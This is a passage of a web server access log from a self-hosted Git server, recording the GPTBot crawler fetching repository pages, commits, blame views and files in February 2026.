192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13645] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12390] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13510] [Gzip 5.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:16:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71837] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:16:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 11031] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13547] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13546] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13546] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13548] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13545] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf?display=source" [Client 74.7.227.38] [Length 12216] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:16:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md?display=rendered" [Client 74.7.227.38] [Length 15779] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" +[17/Feb/2026:16:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:16:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11170] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14056] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14055] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14054] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14054] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14054] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16199] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" +[17/Feb/2026:16:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11170] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 13467] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169571] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:16:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169600] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:16:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11168] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 11119] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11047] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:16:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fbase_library.zip" [Client 74.7.227.38] [Length 19763] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:16:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html" [Client 74.7.227.38] [Length 70781] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:16:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10357] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:16:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 13453] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" +[17/Feb/2026:16:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 